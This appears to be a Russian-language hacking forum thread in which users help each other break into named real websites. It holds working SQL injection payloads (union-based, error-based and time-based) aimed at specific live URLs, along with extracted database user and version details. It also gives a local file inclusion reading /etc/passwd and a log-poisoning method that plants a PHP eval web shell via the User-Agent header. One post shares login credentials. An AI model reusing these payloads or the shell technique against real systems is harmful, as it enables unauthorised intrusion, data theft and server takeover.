Походу пмогло тк после залития открылись все почти деректории. хотя хз тк там перед залитием они переименовывают их походу так что неизвестно поч так произошло.
кол-во полей подобрать не смог всё время ошибка побывал так homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1 ошибка исчезла но увы результат 0
пробовал в 3 браузерах результат тот же. Там запятые фильтруются, backtick также фильтруется попробовал так PHP: /homepage.php?page=4&userid=dd1'+union+select * from(select 0 a1) a1 join(select 0 a2) a2 join(select 0 a3) a3 join(select 0 a4) a4 join(select 0 a5) a5 join(select 0 a6) a6+union+select+* from(select username from bwcore_member limit 0)x join(select avatar_url from bwcore_member+limit+0)xx join(select * from bcs_fav_vendor+limit+0)xxx+--+a ответ Code: Fatal error: MySQL error: Too many connections in /rn1/renderosity/public_html/classes/class.bw_Database.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 162
помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить Code: http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20version%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--+f
Похоже и не выведет. Я смог покрутить только через Time-Based SQL User: gameee_base@localhost Sql: 5.5.14 DB: icmeee_base Вот тебе 2 способа на выбор Code: http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+if(substring((version()),1,1)=5,BENCHMARK(100000,MD5(0x41)),0) http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+sleep(substring((version()),1,1))
Чёт меня постоянно в бан кидает. Надоели уже прокси. Вот что накопал - последние 2 запроса не чекал тк, опять в бане. Code: http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+88+--+ FALSE http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+87+--+ TRUE http://www.renderosity.com/homepage.php?page=4&userid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87+--+ http://www.renderosity.com/homepage.php?page=4&userid=1'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87+--+ Для авторизации можете заюзать мой акк BigBear-x/123456
Решил попрактиковаться в Php inj,вобщем взял сайт из раздачи-вот "http://macrohosting.ru/?" Делаю запрос ../../../../etc/passwd (good),дальше пробую proc/self/environ выводится какая то елда в виде "?????????????????????????" Собственно вопрос:что это такое? и какие ещё есть способы залития шелла?. Читал про error.log но толком не понял как это делается.
to Testosteron Если вкратце, то например вставляете в поле User-Agent мини шелл (например <? eval($_REQUEST[e];?>), вызываете ошибку, данные записываются в error.log, дальше вы инклудите этот файл (если конечно нашли его месторасположение на сервере) и дальше работаете с ним "http://macrohosting.ru/?file=../../../../var/logs/error.log&e=phpinfo();" UPD. Можете прочитать тут по этому поводу... Да и не забудьте проверить wrappers!
2Sat-hacker прочитать можно про скуль почти от А до Я на крупном хек сайте https://forum.antichat.ru/ Ваш КЭП!
www.bondware.com помогите плз со скулей, версия '5.0.77-log'но таблицы не хочет выводить /?1'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1 побывал так Code: 1'or(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tabl es+g roup+by+x)a)and(1)='1 если так Code: /?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1 то, что жирненькое, таблица limit 0,1
Товарищи Гуру-инъектры! Вобщем даже незнаю как вам на пальцах объяснить.... В скрипте запрос записывает данные, которые вписал юзер из формы, в БД. Code: INSERT INTO servers(map,ip,port,status) VALUES ($map,$ip,$port,$status); Когда в поле ввожу одинарную ковычку, то при отправке формы выскакивает ошибка на странице: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '32', `map`='ggg', `status`='1' WHERE `ip`' at line 3" Я в поля уже и select @@version тыкал, оно просто отображает это как текст. Даже не знаю что и делать Может кто подскажет как это дело раскрутить до конца?
всем привет! создаю сайт и параллельна изучаю sql. и натолкнулся на такую непонятку на форумах везде проверки уязвимости ТИПА ?advanced=1`(при таком запросе у меня `-фильтруется), а вот при запросе ?`dvanced=1 страница немного видоизменяется может ли это являтся уязвимостью и как проверить? проверка стандартным запросом - тоесть запрос после ?advanced=1. Типа ?advanced=1 union select... или же здесь запрос нужно вставлять между ? и advanced=1
